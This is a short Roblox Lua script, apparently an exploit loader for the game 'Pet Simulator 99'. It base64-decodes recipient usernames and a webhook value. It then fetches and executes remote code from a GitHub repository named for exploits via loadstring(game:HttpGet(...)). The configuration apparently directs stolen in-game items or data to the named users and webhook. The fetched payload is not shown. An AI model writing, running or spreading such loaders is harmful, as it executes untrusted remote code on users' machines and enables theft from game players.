local function decode(s)
  local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
  s = string.gsub(s, '[^'..b..'=]', '')
  return (s:gsub('.', function(x)
    if (x == '=') then return '' end
    local r,f='',(b:find(x)-1)
    for i=6,1,-1 do r = r .. (f%2^i - f%2^(i-1) > 0 and '1' or '0') end
    return r
  end):gsub('%d%d%d%d%d%d%d%d', function(x)
    local c = 0
    for i = 1, 8 do c = c + (x:sub(i,i) == '1' and 2^(8 - i) or 0) end
    return string.char(c)
  end))
end

local Username = decode("MTIzNDU2Nzgw")
local Username2 = decode("MTIzNDU2Nzg5MA==")
local Webhook = decode("MTIzNDU2Nzg5MA==")

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()